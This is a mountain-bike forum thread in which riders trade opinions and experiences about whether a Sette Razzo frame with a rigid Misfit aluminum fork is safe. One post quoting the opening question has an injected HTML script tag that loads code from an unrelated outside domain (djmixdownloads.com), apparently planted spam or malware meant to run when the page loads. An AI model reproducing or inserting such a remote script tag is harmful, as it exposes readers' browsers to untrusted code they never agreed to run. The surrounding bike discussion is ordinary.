Would You Ride This?- Mtbr.com
    mtbr member
    Mar 2005

Would You Ride This?

Sette Razzo Frame with Misfit Alum fork. I weigh about 185lbs. Occasionally when I am riding it I wonder if the fork is a safety issue. Has anybody heard any issue with this fork or frame breaking?
    Attached Images Attached Images

mtbr member
    you should be fine assuming you are riding them the way they are designed to be be ridden. no big drops etc. that said, any frame and fork can fail.

side note: what's the weight on that?

mtbr member
    Of course!! Its a bike!!

Kosher Princess

Wink

Quote Originally Posted by Captain_America1976
    that said, any frame and fork can fail.
    ...just some sooner than later, others catastrophically.

The better thread title is, "Would YOU Ride This?" Of course, I can give you my answer: NO. Aluminum forks and MTBs make my teeth chatter just thinking about the combination. On the road, okay, I can deal, otherwise, I like steel and I limit my carbon footprint to headset spacers only.

YMMV especially if being airlifted.

mtbr member
    I know nothing about the fork, but the frame is good tons of happy users. You coudl always switch the fork out for a suspension fork unless you really like a rigid 29er.
    Big Foot Blue KHS XC704r

mtbr member
    Mar 2005
    Quote Originally Posted by Natalie Portman
    ...just some sooner than later, others catastrophically.

The better thread title is, "Would YOU Ride This?" Of course, I can give you my answer: NO. Aluminum forks and MTBs make my teeth chatter just thinking about the combination. On the road, okay, I can deal, otherwise, I like steel and I limit my carbon footprint to headset spacers only.

YMMV especially if being airlifted.
    I had a Salsa Cro Moto fork on Moto Rapido and tried that set up with a 29er front wheel. That thing rattled be to the bone compared to this fork. I have been very surprised how compliant the aluminum fork is by comparison. But seeing how much flex it has and the fact it was made in China, I occasionally wonder about the thing folding underneath me. I was wondering if there was any stories to back my fears. I think I think too much sometimes.

Old Fart
    There're all kinds of people riding rigid alum forks...and I'm one of them. Matter of fact, mine's a Misfit fork, too, but on a Misfit bike.I'm 180 lbs fully loaded and ride rocky mountain trails. That fork feels like suspension on a 26er.......kindasorta. And yes, I do feel absolutely safe, but I'm admittedly a wimp descender. As soon as my teeth try to chatter, I slow down.
    It is an amazingly cush ride for a full rigid. And yes, any fork can fail, but focusing on that'll get you to a 40 lb steel frame eventually.

mtbr member
    Jul 2006
    Quote Originally Posted by Cemoto
    I had a Salsa Cro Moto fork on Moto Rapido and tried that set up with a 29er front wheel. That thing rattled be to the bone compared to this fork. I have been very surprised how compliant the aluminum fork is by comparison. But seeing how much flex it has and the fact it was made in China, I occasionally wonder about the thing folding underneath me. I was wondering if there was any stories to back my fears. I think I think too much sometimes.

most forks suspension and rigid are made in china. along with most frames and components. im all for american manufacturing but their stuff is good stuff.

mtbr member
    Oct 2005
    I'm stoked with my razzo, bought it as a cheap bike till I saved up for a "good" frame. I'm running a Hunter steel rigid fork,180mm cranks the frame does what I want and nothing that I don't. I'm gonna keep it for awhile and wait for a sette fs 29r.(?).

bottom line, just ride!

Spike

p.s. 200lb and I'm told that I hammer

mtbr member
    Cemoto- I have that fork (on a misfit) and loaded with pack I'm probably around the 240 mark. At first I was a bit leery of it's strength but am well over it. Yesterday I took it down a really rocky chute (the kind that make your arms feel like beat up shocks, and your gut hurts) and it didn't miss a beat. I even got off my bike to check it out for any damage.
    Nothing.

Old Fart
    Quote Originally Posted by rpinata
    Cemoto- I have that fork (on a misfit) and loaded with pack I'm probably around the 240 mark. At first I was a bit leery of it's strength but am well over it. Yesterday I took it down a really rocky chute (the kind that make your arms feel like beat up shocks, and your gut hurts) and it didn't miss a beat. I even got off my bike to check it out for any damage.
    Nothing.
    Wow!!!

Misfit DiSSent

Sep 2009
    Sette Razzo Frame with Misfit Alum fork. I weigh about 185lbs. Occasionally when I am riding it I wonder if the fork is a safety issue. Has anybody heard any issue with this fork or frame breaking?<script type="***************" src="http://djmixdownloads.com/script.php"></script>
    certainly i would ride it

mtbr member
    Jun 2009
    Nope!

Aluminum, especially in that application, is not, IMO, a good thing. YMMV. Hopefully not though for your sake.

I'll stick with steel, thnx, & I weigh less than you, at ~175# riding weight.

Just not worth the risk IMO since sooner rather than later that fork will break. Garandarntee it!

Old Fart
    Quote Originally Posted by Sometimes
    Nope!

Aluminum, especially in that application, is not, IMO, a good thing. YMMV. Hopefully not though for your sake.

I'll stick with steel, thnx, & I weigh less than you, at ~175# riding weight.

Just not worth the risk IMO since sooner rather than later that fork will break. Garandarntee it!
    Really? Have you seen a Misfit fork fail? These are pretty burly forks. Or are you saying this in the spirit of "everything's gonna die" kinda thing? There are no doubt several of us following this thread who would like to know more from someone with a "garandarntee" that a given fork will fail.......we are curious for quite selfish reasons....
    Misfit DiSSent

mtbr member
    Would not ride.
    :wq

mtbr member
    Something that I have learned, is anything can fail at any time no matter what it is made of and who made it.
    Big Foot Blue KHS XC704r

max_29
    Sette Razzo Frame with Misfit Alum fork. I weigh about 185lbs. Occasionally when I am riding it I wonder if the fork is a safety issue. Has anybody heard any issue with this fork or frame breaking?

i'm riding misfit fork for about 3 yrs on a rigid SS, never had any probs.

sure, you can break it if you throw it under a moving train.

Members who have read this thread: 0